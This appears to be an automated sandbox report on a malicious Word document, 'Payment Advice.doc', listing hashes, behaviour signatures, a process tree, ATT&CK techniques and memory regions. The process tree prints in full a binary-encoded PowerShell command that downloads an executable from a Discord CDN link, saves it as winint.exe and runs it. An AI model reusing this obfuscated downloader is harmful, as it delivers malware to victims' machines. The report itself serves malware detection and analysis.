Overview

overview

10

Static

static

8

Payment Advice.doc

windows7_x64

10

Payment Advice.doc

windows10_x64

10

Analysis

  • max time kernel
    289s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    15-07-2021 20:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Payment Advice.doc

  • Size

    217KB

  • MD5

    a1bb900ae8003b924f333442c4117a84

  • SHA1

    126cd9e2de926ade2cdb20fb8d2a059b7786fde6

  • SHA256

    9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80

  • SHA512

    c7dbbc07793a59b038f5376b345aeb9c967f339b36e9242043207a66bc27a6b3046f7d143a61d48ae4ef9423efcff6919d30cfb86e736f16aa74dcf81c812f5e

Score
10/10
persistence

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Advice.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,01110011,00111010,00101111,00101111,01100011,01100100,01101110,00101110,01100100,01101001,01110011,01100011,01101111,01110010,01100100,01100001,01110000,01110000,00101110,01100011,01101111,01101101,00101111,01100001,01110100,01110100,01100001,01100011,01101000,01101101,01100101,01101110,01110100,01110011,00101111,00111000,00110101,00110110,00111001,00110010,00110101,00111001,00110101,00110010,00110000,00110000,00110100,00110000,00110110,00110011,00110010,00110100,00110010,00101111,00111000,00110110,00110101,00110010,00110111,00110100,00110010,00110000,00110010,00110011,00110111,00111000,00110110,00110000,00110000,00110100,00110100,00111001,00101111,01010011,01100101,01100011,01110101,01110010,01100101,01000101,01000110,01010100,01001110,01101111,01110100,01101001,01100011,01100101,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Users\Admin\AppData\Local\Temp\winint.exe
        "C:\Users\Admin\AppData\Local\Temp\winint.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:296
        • C:\Windows\SysWOW64\dialer.exe
          C:\Windows\System32\dialer.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:300
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 148
            5⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1540
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1380

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\winint.exe
      MD5

      36f250cb265a9ea1e50697c0def52aa8

      SHA1

      ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3

      SHA256

      eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514

      SHA512

      ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\winint.exe
      MD5

      36f250cb265a9ea1e50697c0def52aa8

      SHA1

      ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3

      SHA256

      eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514

      SHA512

      ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56

      Download Submit
    • \Users\Admin\AppData\Local\Temp\winint.exe
      MD5

      36f250cb265a9ea1e50697c0def52aa8

      SHA1

      ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3

      SHA256

      eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514

      SHA512

      ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56

      Download Submit
    • \Users\Admin\AppData\Local\Temp\winint.exe
      MD5

      36f250cb265a9ea1e50697c0def52aa8

      SHA1

      ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3

      SHA256

      eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514

      SHA512

      ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56

      Download Submit
    • memory/296-94-0x0000000000220000-0x0000000000221000-memory.dmp
      Filesize

      4KB

      Download
    • memory/296-91-0x0000000000000000-mapping.dmp
      Download
    • memory/300-103-0x0000000000150000-0x0000000000151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/300-104-0x0000000010590000-0x000000001060D000-memory.dmp
      Filesize

      500KB

      Download
    • memory/300-101-0x0000000000080000-0x0000000000081000-memory.dmp
      Filesize

      4KB

      Download
    • memory/300-102-0x0000000000100000-0x0000000000101000-memory.dmp
      Filesize

      4KB

      Download
    • memory/300-97-0x0000000000000000-mapping.dmp
      Download
    • memory/564-88-0x00000000066F0000-0x00000000066F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-66-0x00000000047C0000-0x00000000047C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-79-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-80-0x0000000006460000-0x0000000006461000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-87-0x0000000006300000-0x0000000006301000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-63-0x0000000000000000-mapping.dmp
      Download
    • memory/564-73-0x0000000005730000-0x0000000005731000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-70-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-69-0x0000000004750000-0x0000000004751000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-68-0x0000000000A32000-0x0000000000A33000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-67-0x0000000000A30000-0x0000000000A31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-78-0x0000000006180000-0x0000000006181000-memory.dmp
      Filesize

      4KB

      Download
    • memory/564-65-0x0000000000B40000-0x0000000000B41000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1380-106-0x0000000000000000-mapping.dmp
      Download
    • memory/1380-107-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1540-99-0x0000000000000000-mapping.dmp
      Download
    • memory/1540-105-0x0000000002300000-0x0000000002301000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1820-59-0x00000000729D1000-0x00000000729D4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1820-62-0x0000000076641000-0x0000000076643000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1820-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1820-60-0x0000000070451000-0x0000000070453000-memory.dmp
      Filesize

      8KB

      Download